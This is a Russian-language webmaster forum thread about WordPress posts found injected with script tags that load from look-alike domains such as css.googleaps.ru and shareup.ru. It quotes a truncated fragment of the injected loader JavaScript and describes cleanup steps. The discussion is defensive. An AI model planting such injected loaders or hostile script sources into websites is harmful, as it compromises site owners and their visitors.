Парни, нашел на страницах одного из сайтов вот такой код - css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2 Подробнее на картинке, что это? Какой-то плагин навставлял? #сдл

взломали и редирект вставили. домен же видно что не гугловский.

Mik Foxi, а что за редирект? Вроде никуда не бросает, странно, но код прямо в записях в ВП вставлен, в разные места...

Mik Foxi, Просто я не пойму, зачем вставлять в старницы, если можно вставить в код шаблона... тем более страниц не так много, все в записях, но записи через доп поля, туда код и не вставишь ))

Обнаружил и на других сайтах с одного хостинга... видно целый хост сломали... Есть и другая версия кода - scri... src=//shareup . ru/social.js Код грузит сайт и тот тупит... Кстати, если в гугле прописать, то видно как многие сайты на ВП заражены... google.ru

Проверил все сайты на одном из хостов, все заражены этой херью... на втором хосте все впорядке, видно хост дырявый... как личить? Подскажите, парни! Сейчас все эти сайты уже на ВПС, пароли к БД изменены.

STRIJ, а что этот код делает ?

Антон Клонов, если бы я знал )) Зайди на сайт и погляди, там вот такой код - if (!load_frst) var load_frst=1; var ref=escape(document.referrer); var ref_js=window.location; document.write('');

Лечу автозаменой строк кода в БД, пароли на БД уже изменены, хостинг сменен на ВДС, пароли на админку меняю, обновляю ВП до последней версии 4,3 и все плагины. Надеюсь поможет...

Вот тут обсуждают, но кроме догадок пока ничего toster.ru